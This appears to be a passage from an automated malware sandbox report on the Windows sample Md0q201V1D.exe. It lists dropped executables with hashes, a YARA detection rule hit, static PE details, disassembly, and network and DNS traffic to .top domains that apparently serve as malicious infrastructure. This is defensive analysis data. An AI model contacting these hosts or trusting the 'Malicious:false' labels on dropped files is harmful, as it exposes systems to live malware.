                                                                                                                                                SHA-256:C673B8408DB0EB515651E6A6F3361C713903001011C6E13A1825C0376A83D1DD
                                                                                                                                                SHA-512:3CC343A53051BE34B4CAD9AA9A9AE68D6B5A978B2ECD10516E4934452D29A9455A6CEB5EB7C7B691B2D08F1781BFB7B1E3627CB2823DD4F60860861F2202BA8F
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5.>.T.m.T.m.T.m."2m.T.m.".m.T.m."3mqT.m.,.m.T.m.T.m.T.m."6m.T.m.".m.T.m.".m.T.mRich.T.m........PE..L....8?`......................v.....`.............@...........................z......f......................................$...d....py..I....................y..... ..................................@............................................text............................... ..`.data...H.u.........................@....rsrc....I...py..J..................@..@.reloc...#....y..$..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\F11E.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1111994
                                                                                                                                                Entropy (8bit):7.9252602794269915
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:4CRVwOoPzND9Tl7RUGb+89w4ZFLkAPLYLSeUr:hOhJGTIAAcns
                                                                                                                                                MD5:27E7D6FAA08A1A69CB7C62D199B1B4F6
                                                                                                                                                SHA1:507F02D50BA701760A6D2303A648563030FB3ECD
                                                                                                                                                SHA-256:3896AD778346B9D5B04331410015969F2AF655B6277DBF612721027B73173E50
                                                                                                                                                SHA-512:7100ED807C5C1C56D5A3FCB4E69BE326F5D14BC44076E2E35355E6B8E3A175ED1B9FF4BC9C82FBCB1C19D1DD552E1D9242CD17CD5C44F9320C067ACA301D1059
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j@...!.R.!.R.!.R'Y.R4!.R'Y.R.!.R'Y.R=!.R.!.R.!.R'Y.Ry!.R'Y.R/!.R'Y.R/!.R'Y.R/!.RRich.!.R........PE..L....ALV.....................~......\.............@..........................`..........................................3...............xE..........................................................@...@...............(............................text...)........................... ..`.rdata...F.......H..................@..@.data...(.... ......................@....rsrc...xE.......F..."..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\F1AC.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3904000
                                                                                                                                                Entropy (8bit):7.959244774483495
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:zvl5DY66TDyQmymjivZkn7ikGqoa2+GEm:LY1TmlGv2nm2oa2+G
                                                                                                                                                MD5:3D0D60FAAE1EDD40DBF2CC9906FE2EC4
                                                                                                                                                SHA1:53B3CFBF2EBFFFD09932EF3DDC54BD993F2AD921
                                                                                                                                                SHA-256:D5758DC0615523F537C19BC7D9C6D7C530AAF3749C57147D6264EEA0DD24522A
                                                                                                                                                SHA-512:38F8701FC34D1FDD32B74EB3941180D542E859E2B3A2630767C2D0E3F992B4F5199DE38CEA6B67FC570FFE2C83F010F1DA4028519616272F36D01D887339103D
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....ya.........."......T...:9..........`8...@...... ........................;......`<...`...@......@............... ................................:.d............................................................................................`8.H...........Cgw(.O~.$+8.. ...,8.................@....text....S...`8..T...08............. ..`.rsrc...d.....:.......:.............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\FD36.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):516536
                                                                                                                                                Entropy (8bit):7.850812641211313
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:qw86shtDE09VgbshnKMstp7eylszgTDzLTDaMqvK8J+ymtE:qVhdLVg2Zep7njXzPDxC+TE
                                                                                                                                                MD5:C55C023A1BEA32E71A99614D39DC4DD6
                                                                                                                                                SHA1:44809A18A01B2647C9A80AF0EF9CA131EEF34E97
                                                                                                                                                SHA-256:D7241A7DA97FDEFE199F23605BFAB8F878728A71F4B1B12F26AA83F775AE2FC5
                                                                                                                                                SHA-512:5A4A071A5CE5EB921738324AF71A8434DF5AF2219016006A0002D6918DCADAD8580BEF6D4973F05ACD9FF68C23DE6B8C3F6308709294DAD03D024068C9F42667
                                                                                                                                                Malicious:false
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\FD36.exe, Author: Florian Roth
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.............~.... ........@.. .......................@.......'....`.................................$...W............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................`.......H........t..<k...........Y..X...........................................MZ......................@...............................................!....!This program cannot be run in DOS mode....$.......PE...................." ..P.............Z8... ...@....... ....................................@..................................8..O....@..x....................`.......7............................................... ............... ..H............text...`.... ..................

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):6.008556977987189
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:Md0q201V1D.exe
                                                                                                                                                File size:346624
                                                                                                                                                MD5:a0bc297d8eaad37f1b145d108786e993
                                                                                                                                                SHA1:ac6858536f64ec7113f1cd10b248430da8510db8
                                                                                                                                                SHA256:b06b803c1a654849e7b0310b0b590ca574568ab9eba41858e8caaff5dbbeacba
                                                                                                                                                SHA512:8c18514c5d43497b5711131b0328cbf7c6ecd51f04a60f421175786c7431b999e30bd5b16fe9345c38fd3e0c26a682a611602a1b2fe657488485246b3ba3b541
                                                                                                                                                SSDEEP:3072:rwrBNjy106UX1gBXf8fVzu3kkGwSQ46yyZ4AX/cpM0p2a4sqOD06zWusdImyJLiT:0VT1fVzBnKyyH/cKy4sqOIwyy
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m..2m...m...m...m..3mq..m...m...m...m...m..6m...m...m...m...m...mRich...m................PE..L......_...........

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:aedaae9ecea62aa2

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x41cb20
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                Time Stamp:0x5FA116E2 [Tue Nov 3 08:37:54 2020 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:5
                                                                                                                                                OS Version Minor:1
                                                                                                                                                File Version Major:5
                                                                                                                                                File Version Minor:1
                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                Import Hash:e522cb867082e04c7a4b61561f8516ce

                                                                                                                                                Entrypoint Preview

                                                                                                                                                Instruction
                                                                                                                                                mov edi, edi
                                                                                                                                                push ebp
                                                                                                                                                mov ebp, esp
                                                                                                                                                call 00007FAB6473E7EBh
                                                                                                                                                call 00007FAB64739636h
                                                                                                                                                pop ebp
                                                                                                                                                ret
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                mov edi, edi
                                                                                                                                                push ebp
                                                                                                                                                mov ebp, esp
                                                                                                                                                push FFFFFFFEh
                                                                                                                                                push 0043C9B0h
                                                                                                                                                push 00421A40h
                                                                                                                                                mov eax, dword ptr fs:[00000000h]
                                                                                                                                                push eax
                                                                                                                                                add esp, FFFFFF98h
                                                                                                                                                push ebx
                                                                                                                                                push esi
                                                                                                                                                push edi
                                                                                                                                                mov eax, dword ptr [0043E494h]
                                                                                                                                                xor dword ptr [ebp-08h], eax
                                                                                                                                                xor eax, ebp
                                                                                                                                                push eax
                                                                                                                                                lea eax, dword ptr [ebp-10h]
                                                                                                                                                mov dword ptr fs:[00000000h], eax
                                                                                                                                                mov dword ptr [ebp-18h], esp
                                                                                                                                                mov dword ptr [ebp-70h], 00000000h
                                                                                                                                                lea eax, dword ptr [ebp-60h]
                                                                                                                                                push eax
                                                                                                                                                call dword ptr [00401070h]
                                                                                                                                                cmp dword ptr [02B339C4h], 00000000h
                                                                                                                                                jne 00007FAB64739630h
                                                                                                                                                push 00000000h
                                                                                                                                                push 00000000h
                                                                                                                                                push 00000001h
                                                                                                                                                push 00000000h
                                                                                                                                                call dword ptr [004010FCh]
                                                                                                                                                call 00007FAB647397B3h
                                                                                                                                                mov dword ptr [ebp-6Ch], eax
                                                                                                                                                call 00007FAB64741A9Bh
                                                                                                                                                test eax, eax
                                                                                                                                                jne 00007FAB6473962Ch
                                                                                                                                                push 0000001Ch
                                                                                                                                                call 00007FAB64739770h
                                                                                                                                                add esp, 04h
                                                                                                                                                call 00007FAB647413F8h
                                                                                                                                                test eax, eax
                                                                                                                                                jne 00007FAB6473962Ch
                                                                                                                                                push 00000010h
                                                                                                                                                call 00007FAB6473975Dh
                                                                                                                                                add esp, 04h
                                                                                                                                                push 00000001h
                                                                                                                                                call 00007FAB64741343h
                                                                                                                                                add esp, 04h
                                                                                                                                                call 00007FAB6473F15Bh
                                                                                                                                                mov dword ptr [ebp-04h], 00000000h
                                                                                                                                                call 00007FAB6473DB3Fh
                                                                                                                                                test eax, eax

                                                                                                                                                Rich Headers

                                                                                                                                                Programming Language:
                                                                                                                                                • [LNK] VS2010 build 30319
                                                                                                                                                • [ASM] VS2010 build 30319
                                                                                                                                                • [ C ] VS2010 build 30319
                                                                                                                                                • [C++] VS2010 build 30319
                                                                                                                                                • [RES] VS2010 build 30319
                                                                                                                                                • [IMP] VS2008 SP1 build 30729

                                                                                                                                                Data Directories

                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3cfe40x64.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x27360000x3c00.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x273a0000x1b90.reloc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x12300x1c.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1bfa00x40.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x10000x1dc.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                Sections

                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x10000x3cb180x3cc00False0.598652906379data6.98974133443IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                .data0x3e0000x26f69c80x1600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                .pale0x27350000x2e50x400False0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rsrc0x27360000x3c000x3c00False0.746940104167data6.42028876467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .reloc0x273a0000x123f00x12400False0.0812553510274data1.05090954457IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                Resources

                                                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                                                RT_ICON0x27362400x25a8dataSpanishParaguay
                                                                                                                                                RT_ICON0x27387e80x10a8dataSpanishParaguay
                                                                                                                                                RT_STRING0x27399d00x72dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                RT_STRING0x2739a480x1b6dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                RT_ACCELERATOR0x27399200x90dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                RT_ACCELERATOR0x27398b80x68dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                RT_GROUP_ICON0x27398900x22dataSpanishParaguay
                                                                                                                                                None0x27399c00xadataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                None0x27399b00xadataDivehi; Dhivehi; MaldivianMaldives

                                                                                                                                                Imports

                                                                                                                                                DLLImport
                                                                                                                                                KERNEL32.dllGetDriveTypeW, GetCPInfo, HeapAlloc, InterlockedIncrement, GetSystemWindowsDirectoryW, SetEnvironmentVariableW, QueryDosDeviceA, GetNamedPipeHandleStateA, SetHandleInformation, FindFirstFileExW, LockFile, BackupSeek, FreeEnvironmentStringsA, GetModuleHandleW, IsBadReadPtr, ActivateActCtx, GetPrivateProfileIntA, SetFileShortNameW, ReadConsoleInputA, CopyFileW, GetSystemWow64DirectoryW, GetVersionExW, SetDllDirectoryA, GetSystemDirectoryA, CreateActCtxA, CompareStringW, GetStartupInfoW, VerifyVersionInfoW, TlsGetValue, GetLongPathNameW, SetLastError, GetProcAddress, FindVolumeMountPointClose, WriteProfileSectionA, GlobalGetAtomNameA, FindClose, GetPrivateProfileStringA, OpenWaitableTimerA, LocalAlloc, SetSystemTime, GetModuleFileNameA, FindFirstChangeNotificationA, GetProcessShutdownParameters, FreeEnvironmentStringsW, BuildCommDCBA, GetCurrentDirectoryA, CompareStringA, GetConsoleCursorInfo, TlsAlloc, GetWindowsDirectoryW, GetProfileSectionW, AreFileApisANSI, DeleteFileA, LocalFileTimeToFileTime, CloseHandle, SetStdHandle, GetLastError, GetConsoleAliasesLengthW, FlushFileBuffers, MoveFileA, GetCommandLineW, HeapSetInformation, InterlockedDecrement, DecodePointer, ExitProcess, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, GetModuleFileNameW, WriteFile, GetStdHandle, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapValidate, TlsSetValue, TlsFree, HeapCreate, GetACP, GetOEMCP, IsValidCodePage, LoadLibraryW, RtlUnwind, RaiseException, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, LCMapStringW, MultiByteToWideChar, GetStringTypeW, CreateFileW
                                                                                                                                                USER32.dllGetMenuInfo
                                                                                                                                                GDI32.dllGetBitmapBits
                                                                                                                                                WINHTTP.dllWinHttpReadData

                                                                                                                                                Possible Origin

                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                SpanishParaguay
                                                                                                                                                Divehi; Dhivehi; MaldivianMaldives

                                                                                                                                                Network Behavior

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Oct 29, 2021 14:08:51.100342035 CEST4434972723.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.100454092 CEST49727443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.103466034 CEST4434972823.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.103553057 CEST49728443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.103971004 CEST49728443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.104809999 CEST49728443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.104837894 CEST4434972823.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.109190941 CEST49727443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.109859943 CEST49727443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.109889984 CEST4434972723.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.113672018 CEST4434972623.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.113704920 CEST4434972623.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.113754034 CEST49726443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.113759041 CEST4434972623.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.113780975 CEST49726443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.113785982 CEST4434972623.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.113828897 CEST49726443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.113846064 CEST49726443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.133817911 CEST49726443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.133856058 CEST4434972623.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.134253025 CEST4434972723.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.134274960 CEST4434972723.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.134308100 CEST4434972723.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.134351969 CEST49727443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.134393930 CEST49727443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.134413004 CEST4434972723.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.134495974 CEST49727443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.137830973 CEST4434972823.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.137876987 CEST4434972823.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.137945890 CEST49728443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.137962103 CEST4434972823.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.137984991 CEST49728443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.138011932 CEST49728443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.175230980 CEST49727443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.175271988 CEST4434972723.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.194941044 CEST49728443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.194991112 CEST4434972823.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.502331018 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.502394915 CEST4434972923.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.502491951 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.502819061 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.502841949 CEST4434972923.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.537333012 CEST4434972923.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.537538052 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.540394068 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.541007996 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.541039944 CEST4434972923.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.571634054 CEST4434972923.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.571659088 CEST4434972923.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.571698904 CEST4434972923.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.571820974 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.575550079 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.575575113 CEST4434972923.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.575692892 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.578891993 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.578917980 CEST4434972923.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.651262999 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.651331902 CEST4434973123.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.651452065 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.651649952 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.651667118 CEST4434973123.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.664989948 CEST49732443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.665050030 CEST4434973223.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.665215015 CEST49732443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.666805029 CEST49732443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.666832924 CEST4434973223.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.686347008 CEST4434973123.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.686470032 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.698685884 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.699249029 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.699281931 CEST4434973123.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.701167107 CEST49733443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.701222897 CEST4434973323.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.701373100 CEST49733443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.704227924 CEST4434973223.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.704361916 CEST49732443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.705548048 CEST49733443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.705575943 CEST4434973323.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.705866098 CEST49732443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.706507921 CEST49732443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.706571102 CEST4434973223.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.718539000 CEST49734443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.718595982 CEST4434973423.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.718697071 CEST49734443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.719041109 CEST49734443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.719069004 CEST4434973423.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.721164942 CEST4434973123.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.721184969 CEST4434973123.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.721221924 CEST4434973123.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.721262932 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.721282959 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.721302986 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.733728886 CEST49735443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.733783007 CEST4434973523.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.733951092 CEST49735443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.734678984 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.734740973 CEST4434973123.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.735182047 CEST49735443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.735204935 CEST4434973523.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.736974001 CEST4434973223.211.6.115192.168.2.3

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                Oct 29, 2021 14:09:40.249532938 CEST192.168.2.38.8.8.80xc836Standard query (0)xacokuo8.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:09:40.372556925 CEST192.168.2.38.8.8.80xff0cStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:09:40.629740953 CEST192.168.2.38.8.8.80x5478Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:09:40.880671978 CEST192.168.2.38.8.8.80xbc14Standard query (0)privacytoolzforyou-6000.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:09:43.668574095 CEST192.168.2.38.8.8.80x9db3Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:09:44.010621071 CEST192.168.2.38.8.8.80x8a09Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:00.299552917 CEST192.168.2.38.8.8.80x9567Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:00.549968958 CEST192.168.2.38.8.8.80x947aStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:00.831943989 CEST192.168.2.38.8.8.80x562Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:01.170274973 CEST192.168.2.38.8.8.80x1495Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:01.426273108 CEST192.168.2.38.8.8.80x91d9Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:03.559824944 CEST192.168.2.38.8.8.80xb9c4Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:03.810604095 CEST192.168.2.38.8.8.80x1c0bStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:04.063611031 CEST192.168.2.38.8.8.80xffebStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:04.738146067 CEST192.168.2.38.8.8.80xaa7bStandard query (0)hajezey1.topA (IP address)IN (0x0001)
